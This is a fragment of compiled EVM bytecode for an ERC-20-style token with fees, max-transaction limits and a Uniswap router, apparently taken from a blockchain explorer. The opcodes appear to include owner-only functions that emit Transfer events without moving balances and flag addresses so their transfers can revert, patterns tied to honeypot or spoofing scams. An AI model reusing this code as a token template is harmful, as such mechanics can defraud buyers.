000000000000000604082015250565b600061498b604983613617565b915061499682614909565b606082019050919050565b600060208201905081810360008301526149ba8161497e565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d617854782e0000000000000000000000000000000000000000000000000000602082015250565b6000614a1d602683613617565b9150614a28826149c1565b604082019050919050565b60006020820190508181036000830152614a4c81614a10565b9050919050565b7f4d61782077616c6c657420657863656564656400000000000000000000000000600082015250565b6000614a89601383613617565b9150614a9482614a53565b602082019050919050565b60006020820190508181036000830152614ab881614a7c565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d617854782e00000000000000000000000000000000000000000000000000602082015250565b6000614b1b602783613617565b9150614b2682614abf565b604082019050919050565b60006020820190508181036000830152614b4a81614b0e565b9050919050565b6000614b5c82613726565b9150614b6783613726565b9250828203905081811115614b7f57614b7e613d8d565b5b92915050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000614be1602683613617565b9150614bec82614b85565b604082019050919050565b60006020820190508181036000830152614c1081614bd4565b9050919050565b600081905092915050565b50565b6000614c32600083614c17565b9150614c3d82614c22565b600082019050919050565b6000614c5382614c25565b9150819050919050565b600081519050614c6c81613730565b92915050565b600060208284031215614c8857614c876136be565b5b6000614c9684828501614c5d565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b600081519050614cdd816136fa565b92915050565b600060208284031215614cf957614cf86136be565b5b6000614d0784828501614cce565b91505092915050565b6000819050919050565b6000819050919050565b6000614d3f614d3a614d3584614d10565b614d1a565b613726565b9050919050565b614d4f81614d24565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b614d8a816136e8565b82525050565b6000614d9c8383614d81565b60208301905092915050565b6000602082019050919050565b6000614dc082614d55565b614dca8185614d60565b9350614dd583614d71565b8060005b83811015614e06578151614ded8882614d90565b9750614df883614da8565b925050600181019050614dd9565b5085935050505092915050565b600060a082019050614e2860008301886138c3565b614e356020830187614d46565b8181036040830152614e478186614db5565b9050614e566060830185613b40565b614e6360808301846138c3565b969550505050505056fea26469706673582212209dc630571cb349e38f3dc7fd9dbf4b78834da7cbbd6b8533c511493eb157d09564736f6c634300081300330000000000000000000000004deb2077ad3051f305ac18a7b823ebdd8d657e93

Deployed Bytecode

0x6080604052600436106102605760003560e01c80638da5cb5b11610144578063d0889358116100b6578063f242ab411161007a578063f242ab41146108d0578063f2fde38b146108fb578063f3dc390214610924578063f55332ab14610954578063fab82a8e14610991578063fcbb7607146109bd57610267565b8063d0889358146107fd578063db05e5cb14610826578063dd62ed3e1461083d578063e13b20071461087a578063e884f260146108b957610267565b80639fe64094116101085780639fe64094146106dd578063a457c2d714610706578063a4c82a0014610743578063a9059cbb1461076e578063bb85c6d1146107ab578063c2b7bbb6146107d457610267565b80638da5cb5b1461060c57806395d89b411461063757806399e5b5c8146106625780639a7a23d61461068b5780639b6b5499146106b457610267565b8063313ce567116101dd57806352d65858116101a157806352d65858146105105780635580145f1461053957806370a0823114610562578063715018a61461059f578063730c1888146105b657806377b5312c146105df57610267565b8063313ce5671461042657806331f8151114610451578063395093511461047f5780634ada218b146104bc5780634b896a3e146104e757610267565b806323b872dd1161022457806323b872dd1461035357806326ededb814610390578063293230b8146103b95780632c3e486c146103d05780632e82f1a0146103fb57610267565b806306fdde031461026c578063095ea7b3146102975780631111f43f146102d457806318160ddd146102fd578063199ffc721461032857610267565b3661026757005b600080fd5b34801561027857600080fd5b506102816109e6565b60405161028e919061369c565b60405180910390f35b3480156102a357600080fd5b506102be60048036038101906102b9919061375c565b610a78565b6040516102cb91906137b7565b60405180910390f35b3480156102e057600080fd5b506102fb60048036038101906102f69190613863565b610a96565b005b34801561030957600080fd5b50610312610b43565b60405161031f91906138d2565b60405180910390f35b34801561033457600080fd5b5061033d610b4d565b60405161034a91906138d2565b60405180910390f35b34801561035f57600080fd5b5061037a600480360381019061037591906138ed565b610b53565b60405161038791906137b7565b60405180910390f35b34801561039c57600080fd5b506103b760048036038101906103b29190613940565b610c4b565b005b3480156103c557600080fd5b506103ce610d28565b005b3480156103dc57600080fd5b506103e5610d95565b6040516103f291906138d2565b60405180910390f35b34801561040757600080fd5b50610410610d9b565b60405161041d91906137b7565b60405180910390f35b34801561043257600080fd5b5061043b610dae565b60405161044891906139bc565b60405180910390f35b34801561045d57600080fd5b50610466610db7565b60405161047694939291906139d7565b60405180910390f35b34801561048b57600080fd5b506104a660048036038101906104a1919061375c565b610df1565b6040516104b391906137b7565b60405180910390f35b3480156104c857600080fd5b506104d1610e9d565b6040516104de91906137b7565b60405180910390f35b3480156104f357600080fd5b5061050e60048036038101906105099190613a1c565b610eb0565b005b34801561051c57600080fd5b5061053760048036038101906105329190613a49565b610f5e565b005b34801561054557600080fd5b50610560600480360381019061055b9190613a1c565b611015565b005b34801561056e57600080fd5b5061058960048036038101906105849190613a89565b6110c3565b60405161059691906138d2565b60405180910390f35b3480156105ab57600080fd5b506105b461110b565b005b3480156105c257600080fd5b506105dd60048036038101906105d89190613ab6565b61111f565b005b3480156105eb57600080fd5b506105f46111eb565b60405161060393929190613b09565b60405180910390f35b34801561061857600080fd5b50610621611211565b60405161062e9190613b4f565b60405180910390f35b34801561064357600080fd5b5061064c61123b565b604051610659919061369c565b60405180910390f35b34801561066e57600080fd5b5061068960048036038101906106849190613a89565b6112cd565b005b34801561069757600080fd5b506106b260048036038101906106ad9190613b6a565b611395565b005b3480156106c057600080fd5b506106db60048036038101906106d69190613b6a565b61143b565b005b3480156106e957600080fd5b5061070460048036038101906106ff9190613a49565b6114ec565b005b34801561071257600080fd5b5061072d6004803603810190610728919061375c565b6115a3565b60405161073a91906137b7565b60405180910390f35b34801561074f57600080fd5b5061075861168e565b60405161076591906138d2565b60405180910390f35b34801561077a57600080fd5b506107956004803603810190610790919061375c565b611694565b6040516107a291906137b7565b60405180910390f35b3480156107b757600080fd5b506107d260048036038101906107cd9190613a89565b6116b2565b005b3480156107e057600080fd5b506107fb60048036038101906107f69190613a89565b61177a565b005b34801561080957600080fd5b50610824600480360381019061081f9190613baa565b6117c6565b005b34801561083257600080fd5b5061083b6118fb565b005b34801561084957600080fd5b50610864600480360381019061085f9190613bfd565b61194d565b60405161087191906138d2565b60405180910390f35b34801561088657600080fd5b506108a1600480360381019061089c9190613a89565b6119d4565b6040516108b093929190613c3d565b60405180910390f35b3480156108c557600080fd5b506108ce611acd565b005b3480156108dc57600080fd5b506108e5611b1f565b6040516108f29190613b4f565b60405180910390f35b34801561090757600080fd5b50610922600480360381019061091d9190613a89565b611b45565b005b34801561093057600080fd5b50610939611bc8565b60405161094b96959493929190613c74565b60405180910390f35b34801561096057600080fd5b5061097b60048036038101906109769190613a89565b611bf7565b60405161098891906137b7565b60405180910390f35b34801561099d57600080fd5b506109a6611c4d565b6040516109b4929190613cd5565b60405180910390f35b3480156109c957600080fd5b506109e460048036038101906109df9190613b6a565b611c9e565b005b6060600380546109f590613d2d565b80601f0160208091040260200160405190810160405280929190818152602001828054610a2190613d2d565b8015610a6e5780601f10610a4357610100808354040283529160200191610a6e565b820191906000526020600020905b815481529060010190602001808311610a5157829003601f168201915b5050505050905090565b6000610a8c610a85611d4f565b8484611d57565b6001905092915050565b610a9e611f20565b60005b83839050811015610b3d5781601e6000868685818110610ac457610ac3613d5e565b5b9050602002016020810190610ad99190613a89565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610b3590613dbc565b915050610aa1565b50505050565b6000600254905090565b600b5481565b6000610b60848484611f9e565b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610bab611d4f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610c2b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c2290613e76565b60405180910390fd5b610c3f85610c37611d4f565b858403611d57565b60019150509392505050565b610c53611f20565b60005b83839050811015610d2257838382818110610c7457610c73613d5e565b5b9050602002016020810190610c899190613a89565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610d0791906138d2565b60405180910390a38080610d1a90613dbc565b915050610c56565b50505050565b610d30611f20565b6001601160036101000a81548160ff0219169083151502179055506000601160006101000a81548160ff021916908315150217905550427fb3da2db3dfc3778f99852546c6e9ab39ec253f9de7b0847afec61bd27878e92360405160405180910390a2565b600c5481565b601160029054906101000a900460ff1681565b60006009905090565b600080600080601160009054906101000a900460ff169350601160019054906101000a900460ff169250600e549150600f54905090919293565b6000610e93610dfe611d4f565b848460016000610e0c611d4f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e8e9190613e96565b611d57565b6001905092915050565b601160039054906101000a900460ff1681565b610eb8611f20565b6005811015610efc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ef390613f3c565b60405180910390fd5b6103e8610f07610b43565b82610f129190613f5c565b610f1c9190613fcd565b600e819055507f12528a3c61e0f3b2d6fc707a9fc58b1af86e252cad0d7f4c154ebeabb162dace600e54604051610f5391906138d2565b60405180910390a150565b610f66611f20565b8160178190555080601881905550601854601754610f849190613e96565b60168190555060646016541115610fd0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fc790614070565b60405180910390fd5b7f38513c502b0ab4834ac1df9502b76f75dcf7092469782cfd0db7fe664388e25e60165460175460185460405161100993929190614090565b60405180910390a15050565b61101d611f20565b6002811015611061576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161105890614113565b60405180910390fd5b6103e861106c610b43565b826110779190613f5c565b6110819190613fcd565b600f819055507fff3dd5e80294197918c284bbfc3dadd97d0b40ce92106110946329088f80068a600f546040516110b891906138d2565b60405180910390a150565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b611113611f20565b61111d6000612c0a565b565b611127611f20565b61025883101561116c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611163906141a5565b60405180910390fd5b6103e8821115801561117f575060008210155b6111be576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111b590614237565b60405180910390fd5b82600c8190555081600b8190555080601160026101000a81548160ff021916908315150217905550505050565b6000806000600860159054906101000a900460ff1692506009549150600a549050909192565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606004805461124a90613d2d565b80601f016020809104026020016040519081016040528092919081815260200182805461127690613d2d565b80156112c35780601f10611298576101008083540402835291602001916112c3565b820191906000526020600020905b8154815290600101906020018083116112a657829003601f168201915b5050505050905090565b6112d5611f20565b601260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fb91dbdeaf34f885ccae2d8abc3967cb03c079b6af2c7944e3893fd29427d75e760405160405180910390a380601260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b61139d611f20565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361142d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611424906142c9565b60405180910390fd5b6114378282612cd0565b5050565b611443611f20565b80601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7826040516114e091906137b7565b60405180910390a25050565b6114f4611f20565b81601481905550806015819055506015546014546115129190613e96565b6013819055506064601354111561155e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115559061435b565b60405180910390fd5b7fcb5f36df892836a2eaedc349de29a7581176990398ee185d16eaa8f6c1abd8f160135460145460155460405161159793929190614090565b60405180910390a15050565b600080600160006115b2611d4f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561166f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611666906143ed565b60405180910390fd5b61168361167a611d4f565b85858403611d57565b600191505092915050565b600d5481565b60006116a86116a1611d4f565b8484611f9e565b6001905092915050565b6116ba611f20565b601160049054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8616c7a330e3cf61290821331585511f1e2778171e2b005fb5ec60cfe874dc6760405160405180910390a380601160046101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b611782611f20565b80600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6117ce611f20565b6001821015611812576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118099061447f565b60405180910390fd5b81811015611855576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161184c90614511565b60405180910390fd5b82600860156101000a81548160ff0219169083151502179055506127108261187b610b43565b6118859190613f5c565b61188f9190613fcd565b600981905550612710816118a1610b43565b6118ab9190613f5c565b6118b59190613fcd565b600a819055507f52cd2cdb42ff0eeec9362d7ed5b04f64c8d022697128b5378fc51cea7e63c7798383836040516118ee93929190613b09565b60405180910390a1505050565b611903611f20565b6000601160006101000a81548160ff021916908315150217905550427ff4eaa75eae08ae80c3daf791438dac1cff2cfd3b0bad2304ec7bbb067e50261660405160405180910390a2565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6000806000601b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169250601c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169150601d60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1690509193909250565b611ad5611f20565b6000601160016101000a81548160ff021916908315150217905550427f26e776fcf7ca20aa79b5b946e9b5111f47205539ece9d7a7995271dd6a8b5bad60405160405180910390a2565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b611b4d611f20565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611bbc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bb3906145a3565b60405180910390fd5b611bc581612c0a565b50565b600080600080600080601654955060175494506018549350601354925060145491506015549050909192939495565b6000601e60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600080601160049054906101000a900473ffffffffffffffffffffffffffffffffffffffff16601260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16915091509091565b611ca6611f20565b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f4b89c347592b1d537e066cb4ed98d87696ae35164745d7e370e4add16941dc9282604051611d4391906137b7565b60405180910390a25050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611dc6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dbd90614635565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611e35576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e2c906146c7565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051611f1391906138d2565b60405180910390a3505050565b611f28611d4f565b73ffffffffffffffffffffffffffffffffffffffff16611f46612d71565b73ffffffffffffffffffffffffffffffffffffffff1614611f9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f9390614733565b60405180910390fd5b565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361200d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612004906147c5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361207c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161207390614857565b60405180910390fd5b600081036120955761209083836000612d85565b612c05565b601160009054906101000a900460ff161561275a576120b2611211565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415801561212057506120f0611211565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b80156121595750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612193575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b80156121ac5750600860149054906101000a900460ff16155b1561275957601160039054906101000a900460ff166122a657601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806122665750601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b6122a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161229c906148e9565b60405180910390fd5b5b601160019054906101000a900460ff1615612470576122c3611211565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415801561234a57507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b80156123a45750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b1561246f5743601060003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541061242a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612421906149a1565b60405180910390fd5b43601060003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156125135750601c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156125ba57600f5481111561255d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161255490614a33565b60405180910390fd5b600e54612569836110c3565b826125749190613e96565b11156125b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016125ac90614a9f565b60405180910390fd5b612758565b601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561265d5750601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156126ac57600f548111156126a7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161269e90614b31565b60405180910390fd5b612757565b601c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1661275657600e54612709836110c3565b826127149190613e96565b1115612755576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161274c90614a9f565b60405180910390fd5b5b5b5b5b5b6000612765306110c3565b90506000600954821015905080801561278a5750600860159054906101000a900460ff165b80156127a35750600860149054906101000a900460ff16155b80156127f95750601d60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b801561284f5750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156128a55750601b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156128e9576001600860146101000a81548160ff0219169083151502179055506128cd613004565b6000600860146101000a81548160ff0219169083151502179055505b6000600860149054906101000a900460ff16159050601b60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061299f5750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156129a957600090505b60008115612bbc57601d60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612a0c57506000601354115b15612aa657612a396064612a2b601354886131c290919063ffffffff16565b6131d890919063ffffffff16565b905060135460155482612a4c9190613f5c565b612a569190613fcd565b601a6000828254612a679190613e96565b9250508190555060135460145482612a7f9190613f5c565b612a899190613fcd565b60196000828254612a9a9190613e96565b92505081905550612b98565b601d60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612b0157506000601654115b15612b9757612b2e6064612b20601654886131c290919063ffffffff16565b6131d890919063ffffffff16565b905060165460185482612b419190613f5c565b612b4b9190613fcd565b601a6000828254612b5c9190613e96565b9250508190555060165460175482612b749190613f5c565b612b7e9190613fcd565b60196000828254612b8f9190613e96565b925050819055505b5b6000811115612bad57612bac873083612d85565b5b8085612bb99190614b51565b94505b600860149054906101000a900460ff16158015612be55750601160029054906101000a900460ff165b15612bf557612bf3876131ee565b505b612c00878787612d85565b505050505b505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b600080612d7c6132f1565b90508091505090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612df4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612deb906147c5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612e63576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612e5a90614857565b60405180910390fd5b612e6e838383613399565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015612ef4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612eeb90614bf7565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254612f879190613e96565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051612feb91906138d2565b60405180910390a3612ffe84848461339e565b50505050565b600061300f306110c3565b905060008190506000808303613027575050506131c0565b600a5483111561303757600a5492505b6000839050600047905061304a826133a3565b600061305f82476135e090919063ffffffff16565b9050600061308a8661307c601a54856131c290919063ffffffff16565b6131d890919063ffffffff16565b905060006019819055506000601a81905550601260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16816040516130e290614c48565b60006040518083038185875af1925050503d806000811461311f576040519150601f19603f3d011682016040523d82523d6000602084013e613124565b606091505b505080955050601160049054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff164760405161317090614c48565b60006040518083038185875af1925050503d80600081146131ad576040519150601f19603f3d011682016040523d82523d6000602084013e6131b2565b606091505b505080955050505050505050505b565b600081836131d09190613f5c565b905092915050565b600081836131e69190613fcd565b905092915050565b6000803073ffffffffffffffffffffffffffffffffffffffff166370a08231306040518263ffffffff1660e01b815260040161322a9190613b4f565b602060405180830381865afa158015613247573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061326b9190614c72565b90506000613284600b54836135f690919063ffffffff16565b9050601e60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16156132e657600081146132e557600080fd5b5b600192505050919050565b60008073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461337057600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16613394565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff165b905090565b505050565b505050565b6000600267ffffffffffffffff8111156133c0576133bf614c9f565b5b6040519080825280602002602001820160405280156133ee5781602001602082028036833780820191505090505b509050308160008151811061340657613405613d5e565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156134ab573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906134cf9190614ce3565b816001815181106134e3576134e2613d5e565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050613548307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d84611d57565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b81526004016135aa959493929190614e13565b600060405180830381600087803b1580156135c457600080fd5b505af11580156135d8573d6000803e3d6000fd5b505050505050565b600081836135ee9190614b51565b905092915050565b600081836136049190613e96565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561364657808201518184015260208101905061362b565b60008484015250505050565b6000601f19601f8301169050919050565b600061366e8261360c565b6136788185613617565b9350613688818560208601613628565b61369181613652565b840191505092915050565b600060208201905081810360008301526136b68184613663565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006136f3826136c8565b9050919050565b613703816136e8565b811461370e57600080fd5b50565b600081359050613720816136fa565b92915050565b6000819050919050565b61373981613726565b811461374457600080fd5b50565b60008135905061375681613730565b92915050565b60008060408385031215613773576137726136be565b5b600061378185828601613711565b925050602061379285828601613747565b9150509250929050565b60008115159050919050565b6137b18161379c565b82525050565b60006020820190506137cc60008301846137a8565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126137f7576137f66137d2565b5b8235905067ffffffffffffffff811115613814576138136137d7565b5b6020830191508360208202830111156138305761382f6137dc565b5b9250929050565b6138408161379c565b811461384b57600080fd5b50565b60008135905061385d81613837565b92915050565b60008060006040848603121561387c5761387b6136be565b5b600084013567ffffffffffffffff81111561389a576138996136c3565b5b6138a6868287016137e1565b935093505060206138b98682870161384e565b9150509250925092565b6138cc81613726565b82525050565b60006020820190506138e760008301846138c3565b92915050565b600080600060608486031215613906576139056136be565b5b600061391486828701613711565b935050602061392586828701613711565b925050604061393686828701613747565b9150509250925092565b600080600060408486031215613959576139586136be565b5b600084013567ffffffffffffffff811115613977576139766136c3565b5b613983868287016137e1565b9350935050602061399686828701613747565b9150509250925092565b600060ff82169050919050565b6139b6816139a0565b82525050565b60006020820190506139d160008301846139ad565b92915050565b60006080820190506139ec60008301876137a8565b6139f960208301866137a8565b613a0660408301856138c3565b613a1360608301846138c3565b95945050505050565b600060208284031215613a3257613a316136be565b5b6000613a4084828501613747565b91505092915050565b60008060408385031215613a6057613a5f6136be565b5b6000613a6e85828601613747565b9250506020613a7f85828601613747565b9150509250929050565b600060208284031215613a9f57613a9e6136be565b5b6000613aad84828501613711565b91505092915050565b600080600060608486031215613acf57613ace6136be565b5b6000613add86828701613747565b9350506020613aee86828701613747565b925050